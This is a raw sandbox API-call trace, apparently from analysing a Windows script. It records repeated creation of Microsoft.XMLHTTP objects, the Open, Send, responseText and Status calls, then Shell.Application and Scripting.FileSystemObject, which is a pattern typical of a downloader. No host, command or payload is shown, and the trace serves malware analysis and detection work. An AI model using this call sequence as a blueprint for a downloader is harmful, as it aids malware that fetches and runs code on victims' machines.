	[0778.126] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0778.126] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0778.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0778.126] ??2@YAPEAX_K@Z () returned 0x62f310
	[0778.126] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0778.126] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0778.126] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0778.126] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0778.127] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0778.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0778.127] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0778.127] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0778.127] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0778.127] SysStringLen (param_1=0x0) returned 0x0
	[0778.127] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0778.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0778.128] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0778.128] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0778.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74f8) returned 0x0
	[0778.128] ??2@YAPEAX_K@Z () returned 0x62f330
	[0778.128] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74f8, pUnkSite=0x62f330) 
	[0778.128] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0778.128] XMLHTTPRequest:IUnknown:Release (This=0x49c74f8) returned 0x0
	[0778.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0778.128] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0778.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0778.128] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0778.128] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0778.129] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0778.129] SysStringLen (param_1=0x0) returned 0x0
	[0778.129] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0778.129] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0778.129] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7540) returned 0x0
	[0778.129] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0778.129] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0778.129] ??2@YAPEAX_K@Z () returned 0x62f310
	[0778.129] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0778.129] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0778.129] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0778.129] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7540) returned 0x0
	[0778.130] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7540) returned 0x3
	[0778.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0778.130] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7540, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0778.130] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7540, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0778.130] longjmp () 
	[0778.130] longjmp () 
	[0778.130] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0778.130] SysStringLen (param_1=0x0) returned 0x0
	[0778.130] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0778.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0778.131] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b90) returned 0x0
	[0778.131] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0778.131] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bf8) returned 0x0
	[0778.131] ??2@YAPEAX_K@Z () returned 0x62f330
	[0778.135] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bf8, pUnkSite=0x62f330) 
	[0778.135] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0778.135] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0778.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0778.135] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0778.135] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0778.135] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0778.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0778.136] longjmp () 
	[0778.136] longjmp () 
	[0778.136] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0778.136] SysStringLen (param_1=0x0) returned 0x0
	[0778.136] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0778.136] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0778.136] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0778.136] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0778.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0778.137] ??2@YAPEAX_K@Z () returned 0x62f310
	[0778.137] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0778.137] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0778.137] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0778.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0778.137] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0778.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0778.137] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0778.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0778.137] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0778.138] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0778.138] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0779.493] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0779.493] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0779.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0779.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0779.494] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0779.494] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0779.494] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0779.494] SysStringLen (param_1=0x0) returned 0x0
	[0779.494] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0779.494] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0779.495] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x64ef8b0) returned 0x0
	[0779.495] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0779.495] Shell:IUnknown:QueryInterface (in: This=0x64ef8b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x64ef8f0) returned 0x0
	[0779.495] ??2@YAPEAX_K@Z () returned 0x62f350
	[0779.495] Shell:IObjectWithSite:SetSite (This=0x64ef8f0, pUnkSite=0x62f350) returned 0x0
	[0779.495] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0779.495] Shell:IUnknown:Release (This=0x64ef8f0) returned 0x1
	[0779.495] Shell:IUnknown:QueryInterface (in: This=0x64ef8b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x64ef8b0) returned 0x0
	[0779.495] Shell:IUnknown:AddRef (This=0x64ef8b0) returned 0x3
	[0779.495] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0779.495] SysStringLen (param_1=0x0) returned 0x0
